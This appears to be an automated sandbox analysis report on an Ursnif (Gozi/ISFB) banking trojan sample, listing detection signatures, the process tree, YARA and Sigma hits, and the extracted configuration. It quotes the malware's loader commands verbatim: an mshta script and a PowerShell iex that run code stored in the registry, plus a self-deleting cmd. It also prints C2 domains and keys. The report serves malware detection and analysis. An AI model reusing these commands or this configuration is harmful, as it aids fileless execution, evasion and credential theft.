Play interactive tour

Edit tour

Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Sample Name:	FpYf5EGDO9.exe
Analysis ID:	527488
MD5:	2f1743897afa6f586ae97f53bf55c14e
SHA1:	21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256:	440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
Tags:	exeGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Found malware configuration

Sigma detected: Powershell run code from registry

Multi AV Scanner detection for submitted file

Sigma detected: Encoded IEX

Tries to steal Mail credentials (via file / registry access)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Uses nslookup.exe to query domains

Writes or reads registry keys via WMI

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

Self deletion via cmd delete

Sigma detected: MSHTA Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Changes memory attributes in foreign processes to executable or writable

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Modifies the prolog of user mode functions (user mode inline hooks)

Uses ping.exe to sleep

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Modifies the import address table of user mode modules (user mode IAT hooks)

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Searches for the Microsoft Outlook file path

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Rundll32 Activity

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Classification

Process Tree

System is w10x64

FpYf5EGDO9.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\FpYf5EGDO9.exe" MD5: 2F1743897AFA6F586AE97F53BF55C14E)

control.exe (PID: 2904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 7028 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 4712 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4176 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4544 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 6536 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5192 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)

RuntimeBroker.exe (PID: 1504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 3424 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6088 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6080 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

mshta.exe (PID: 4720 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6736 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5464 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: FpYf5EGDO9.exe PID: 5556	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 4856	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 2904	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4084	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6080	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4176	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4440	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4544	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: cmd.exe PID: 6088	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 61 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.FpYf5EGDO9.exe.3c40000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.43394a0.11.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Sigma Overview

System Summary:

Sigma detected: Encoded IEX

Show sources

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4856, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, ProcessId: 6736

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 2904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6080

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132822035693761408.4856.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry

Show sources

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.510101213.0000000002140000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: FpYf5EGDO9.exe

Virustotal: Detection: 46%

Perma Link

Machine Learning detection for sample

Show sources

Source: FpYf5EGDO9.exe

Joe Sandbox ML: detected

Source: 0.2.FpYf5EGDO9.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.FpYf5EGDO9.exe.2140e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.FpYf5EGDO9.exe.2150000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack

Source: FpYf5EGDO9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
